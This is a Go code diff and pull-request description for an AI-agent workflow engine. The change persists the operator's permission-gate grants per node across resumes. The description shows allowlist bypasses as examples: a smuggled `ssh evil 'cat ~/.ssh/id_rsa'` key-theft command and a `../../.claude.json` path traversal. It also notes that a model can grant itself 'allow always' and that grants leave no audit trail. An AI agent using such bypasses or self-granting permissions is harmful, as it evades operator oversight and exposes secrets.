@@ -74,6 +74,15 @@ type RunStore interface {
 	// right after applying an override in memory.
 	PatchRunSteering(ctx context.Context, runID string, loopOverrides map[string]int, budgetRaises *RunBudgetRaises) error
 
+	// PatchRunPermissionGrants persists the allow rules earned at
+	// permission-gate pauses so a later resume — which builds a fresh
+	// engine and a fresh runState — still carries them. Replaces the
+	// stored slice wholesale with the caller's accumulated set; a nil
+	// slice leaves it untouched. Kept separate from PatchRunSteering
+	// because a grant is an authorization the operator granted, not a
+	// steering knob an operator turned.
+	PatchRunPermissionGrants(ctx context.Context, runID string, grants []string) error
+
 	// PruneDeletionMarkers reaps the durable tombstones DeleteRun
 	// leaves behind (the resurrection guard) once they are older than
 	// cutoff — the marker must outlive any plausible late writer, not

--- a/pkg/store/mongo/runs.go
+++ b/pkg/store/mongo/runs.go
@@ -578,6 +578,24 @@ func (s *Store) PatchRunSteering(ctx context.Context, id string, loopOverrides m
 	return nil
 }
 
+// PatchRunPermissionGrants persists the permission-gate allow rules the
+// operator earned, tenant-scoped. Replaces the stored slice wholesale;
+// a nil slice is a no-op patch.
+func (s *Store) PatchRunPermissionGrants(ctx context.Context, id string, grants []string) error {
+	if grants == nil {
+		return nil
+	}
+	set := bson.M{"updated_at": time.Now().UTC(), "permission_grants": grants}
+	res, err := s.runs.UpdateOne(ctx, notDeleted(withTenantFilter(ctx, bson.M{"_id": id})), bson.M{"$set": set})
+	if err != nil {
+		return fmt.Errorf("store/mongo: patch run permission grants: %w", err)
+	}
+	if res.MatchedCount == 0 {
+		return store.ErrRunNotFound
+	}
+	return nil
+}
+
 func (s *Store) UpdateRunStatus(ctx context.Context, id string, status store.RunStatus, runErr string) error {
 	now := time.Now().UTC()
 	set := bson.M{

--- a/pkg/store/mongo/runs.go
+++ b/pkg/store/mongo/runs.go
@@ -581,7 +581,7 @@ func (s *Store) PatchRunSteering(ctx context.Context, id string, loopOverrides m
 // PatchRunPermissionGrants persists the permission-gate allow rules the
 // operator earned, tenant-scoped. Replaces the stored slice wholesale;
 // a nil slice is a no-op patch.
-func (s *Store) PatchRunPermissionGrants(ctx context.Context, id string, grants []string) error {
+func (s *Store) PatchRunPermissionGrants(ctx context.Context, id string, grants map[string][]string) error {
 	if grants == nil {
 		return nil
 	}

--- a/pkg/store/permission_grants_test.go
+++ b/pkg/store/permission_grants_test.go
@@ -23,7 +23,7 @@ func TestPatchRunPermissionGrantsRoundTrips(t *testing.T) {
 		t.Fatalf("a fresh run already holds grants: %#v", got.PermissionGrants)
 	}
 
-	want := []string{"Write", "Bash(git add:*)"}
+	want := map[string][]string{"writer": {"Write", "Bash(git add:*)"}}
 	if err := s.PatchRunPermissionGrants(ctx, "run-grants", want); err != nil {
 		t.Fatalf("PatchRunPermissionGrants: %v", err)
 	}

--- a/pkg/store/permission_grants_test.go
+++ b/pkg/store/permission_grants_test.go
@@ -1,0 +1,52 @@
+package store
+
+import (
+	"context"
+	"reflect"
+	"testing"
+)
+
+// The grant set has to survive the run record, because every
+// permission-gate pause is resumed by a fresh engine that re-seeds from
+// it. A SaveRun between the patch and the reload would clobber it — this
+// pins that it does not.
+func TestPatchRunPermissionGrantsRoundTrips(t *testing.T) {
+	ctx := context.Background()
+	s := newTestStore(t)
+	if _, err := s.CreateRun(ctx, "run-grants", "wf", nil); err != nil {
+		t.Fatalf("CreateRun: %v", err)
+	}
+
+	if got, err := s.LoadRun(ctx, "run-grants"); err != nil {
+		t.Fatalf("LoadRun: %v", err)
+	} else if len(got.PermissionGrants) != 0 {
+		t.Fatalf("a fresh run already holds grants: %#v", got.PermissionGrants)
+	}
+
+	want := []string{"Write", "Bash(git add:*)"}
+	if err := s.PatchRunPermissionGrants(ctx, "run-grants", want); err != nil {
+		t.Fatalf("PatchRunPermissionGrants: %v", err)
+	}
+	got, err := s.LoadRun(ctx, "run-grants")
+	if err != nil {
+		t.Fatalf("LoadRun after patch: %v", err)
+	}
+	if !reflect.DeepEqual(got.PermissionGrants, want) {
+		t.Errorf("PermissionGrants = %#v, want %#v", got.PermissionGrants, want)
+	}
+
+	// A nil slice is a no-op patch, not an erasure: the steering patches
+	// next door use the same convention.
+	if err := s.PatchRunPermissionGrants(ctx, "run-grants", nil); err != nil {
+		t.Fatalf("no-op patch: %v", err)
+	}
+	if got, err := s.LoadRun(ctx, "run-grants"); err != nil {
+		t.Fatalf("LoadRun after no-op: %v", err)
+	} else if !reflect.DeepEqual(got.PermissionGrants, want) {
+		t.Errorf("a nil patch erased the grants: %#v", got.PermissionGrants)
+	}
+
+	if err := s.PatchRunPermissionGrants(ctx, "no-such-run", want); err == nil {
+		t.Error("patching an unknown run returned no error")
+	}
+}

--- a/pkg/store/run.go
+++ b/pkg/store/run.go
@@ -253,15 +253,19 @@ type Run struct {
 	// rebuilt); raise-only vs the workflow's declared budget. Nil for
 	// runs never raised.
 	BudgetRaises *RunBudgetRaises `json:"budget_raises,omitempty" bson:"budget_raises,omitempty"`
-	// PermissionGrants accumulates the allow rules the operator earned by
-	// answering `allow` / `allow always` at a permission-gate pause. The
-	// message shown at that pause promises the grant holds "for the rest
-	// of this run", and each pause is resumed by a fresh engine with a
-	// fresh runState — so the promise can only be kept if the rules
-	// outlive the run record they were earned under. AUTHORITATIVE across
-	// resume (the engine re-seeds from it). Order-preserving and
-	// deduplicated. Empty for runs that never hit an approved gate.
-	PermissionGrants []string `json:"permission_grants,omitempty" bson:"permission_grants,omitempty"`
+	// PermissionGrants accumulates the `allow always` rules the operator
+	// earned at permission-gate pauses, KEYED BY THE NODE that earned
+	// them. Each pause is resumed by a fresh engine with a fresh
+	// runState, so a grant can only outlive the pause it was answered on
+	// if it outlives the run record too. AUTHORITATIVE across resume (the
+	// engine re-seeds from it). Order-preserving and deduplicated per
+	// node. Empty for runs that never hit an approved gate.
+	//
+	// Keyed per node, not run-wide, because Evaluate ranks allow rules
+	// above the mode default: a run-wide rule would beat a node whose own
+	// `permission: deny` made the gate a hard block, so an approval given
+	// on a permissive node would silently unlock a strict one.
+	PermissionGrants map[string][]string `json:"permission_grants,omitempty" bson:"permission_grants,omitempty"`
 	// RetryPolicy is the retry contract RESOLVED AT LAUNCH from every
 	// layer that can own one (per-run override → launch surface → bot
 	// manifest → machine default, then clamped by the platform ceiling).

--- a/pkg/store/run.go
+++ b/pkg/store/run.go
@@ -253,6 +253,15 @@ type Run struct {
 	// rebuilt); raise-only vs the workflow's declared budget. Nil for
 	// runs never raised.
 	BudgetRaises *RunBudgetRaises `json:"budget_raises,omitempty" bson:"budget_raises,omitempty"`
+	// PermissionGrants accumulates the allow rules the operator earned by
+	// answering `allow` / `allow always` at a permission-gate pause. The
+	// message shown at that pause promises the grant holds "for the rest
+	// of this run", and each pause is resumed by a fresh engine with a
+	// fresh runState — so the promise can only be kept if the rules
+	// outlive the run record they were earned under. AUTHORITATIVE across
+	// resume (the engine re-seeds from it). Order-preserving and
+	// deduplicated. Empty for runs that never hit an approved gate.
+	PermissionGrants []string `json:"permission_grants,omitempty" bson:"permission_grants,omitempty"`
 	// RetryPolicy is the retry contract RESOLVED AT LAUNCH from every
 	// layer that can own one (per-run override → launch surface → bot
 	// manifest → machine default, then clamped by the platform ceiling).

--- a/pkg/store/store_run.go
+++ b/pkg/store/store_run.go
@@ -293,7 +293,7 @@ func (s *FilesystemRunStore) PatchRunSteering(_ context.Context, id string, loop
 // PatchRunPermissionGrants persists the permission-gate allow rules
 // earned by the operator. Replaces the stored slice wholesale (the
 // caller owns the accumulated set); a nil slice is a no-op patch.
-func (s *FilesystemRunStore) PatchRunPermissionGrants(_ context.Context, id string, grants []string) error {
+func (s *FilesystemRunStore) PatchRunPermissionGrants(_ context.Context, id string, grants map[string][]string) error {
 	if grants == nil {
 		return nil
 	}

--- a/pkg/store/store_run.go
+++ b/pkg/store/store_run.go
@@ -290,6 +290,25 @@ func (s *FilesystemRunStore) PatchRunSteering(_ context.Context, id string, loop
 	return s.writeRun(r)
 }
 
+// PatchRunPermissionGrants persists the permission-gate allow rules
+// earned by the operator. Replaces the stored slice wholesale (the
+// caller owns the accumulated set); a nil slice is a no-op patch.
+func (s *FilesystemRunStore) PatchRunPermissionGrants(_ context.Context, id string, grants []string) error {
+	if grants == nil {
+		return nil
+	}
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	r, err := s.loadRunRaw(id)
+	if err != nil {
+		return err
+	}
+	r.PermissionGrants = grants
+	r.UpdatedAt = time.Now().UTC()
+	return s.writeRun(r)
+}
+
 // UpdateRunStatusIf is a compare-and-set on the status field: the
 // write only lands when the current status is in expectedFrom. Used
 // by callers that need to avoid racing with a concurrent transition


### PR DESCRIPTION
## The defect

The permission pause tells the operator:

> Reply `allow` (once), `allow always` (**add to the allowlist for the rest of this run**), or `deny`.

It was added to one policy, for one re-invocation, and then dropped.

Every pause is resumed by a fresh engine with a fresh `runState`. `reInvokeBackend` rebuilds the node input from the edges and sets `GrantInputKey` from **this** pause's answer only; `resolvePermissionPolicy` builds a new policy per invocation and adds that single rule. A run therefore never held more than one grant at a time, and the newest evicted the previous one.

## Why it hurts

The shape of the cost is a node that pauses once per mutation. A bot authoring a documentation pack — one `Write` and one commit per document, a dozen documents — asks the operator to re-authorize `Write`, then `Bash`, then `Write` again, alternating, for the whole pass.

Measured on such a bot: **~23 pauses where 3 were expected**, and every `docs_check` repair loop re-enters the node and pays the toll again.

The second-order effect is worse than the friction. The operator reasonably concludes the gate is broken, and the pressure becomes to pre-authorize the tools wholesale in the bundle's `allow:` list — trading an argument-scoped decision for a blanket one. That is precisely the outcome the gate exists to prevent, and on this codebase it is not a safe trade: `compileArg` anchors `:*` at the start only, so `Bash(git add docs/:*)` also allows `git add docs/x && ssh evil 'cat ~/.ssh/id_rsa'`, and `summarize` returns `file_path` raw, so `Write(**/docs/**)` also allows `docs/../../.claude.json`.

## The fix

Grants accumulate on the run:

- recorded in `runState.permissionGrants` (order-preserving, deduplicated);
- persisted on the run record via a new `PatchRunPermissionGrants`, next to `LoopOverrides` / `BudgetRaises`, which already solve exactly this "state the engine must re-seed at resume" problem;
- re-seeded in `applySteeringState`;
- passed whole to the executor, which adds each rule to the freshly built policy.

A grant now outlives the pause it was earned on, exactly as the message promises — and stops there. `allow` stays argument-scoped, `allow always` stays tool-scoped, and nothing is granted that was never answered.

## The near-miss

`GrantInputKey` has **two** readers. The second — `resumeUserText`, which frames the resume prompt — also asserted `.(string)`. A slice would have fallen through to the `[PERMISSION DENIED]` branch and told the model its *approved* call had been refused. Both readers now go through one `permission.GrantsFrom` helper.

The bare-string form is still accepted, so a checkpoint written by a previous build resumes with its grant intact.

## Tests

`pkg/backend/permission/grants_from_test.go`: every input shape (legacy string, accumulated slice, post-JSON `[]any`, blanks, non-strings, absent, malformed), plus the behavioural test that is the point of the change — a policy rebuilt at a later pause still honours a grant earned at an earlier one, while a tool that was never granted stays `Ask`.

`go test ./...` and `./e2e/...` green, `gofmt` / `go vet` clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)



---

## Scope, after review

Grants are injected in `reInvokeBackend` only. A node re-entered by a loop rebuilds its input through `buildNodeInputRS`, which carries no grant key, so its first off-policy call pauses again. What this delivers is therefore **one pause per node entry**, not one per run — the writer case goes from one pause per mutation to one per entry. Making it run-wide means seeding the executor's run-level allow rules at build time, which is a different seam and deserves its own review.

Two gaps found in review and deliberately left open, each worth its own change: a model-authored `allow always` on an `interaction: llm` node is now persisted (it was already granted before this PR, just not durably — the runtime does not carry answer provenance this far), and a grant emits no event, so there is no audit surface and no revocation path, unlike `run_steered`.
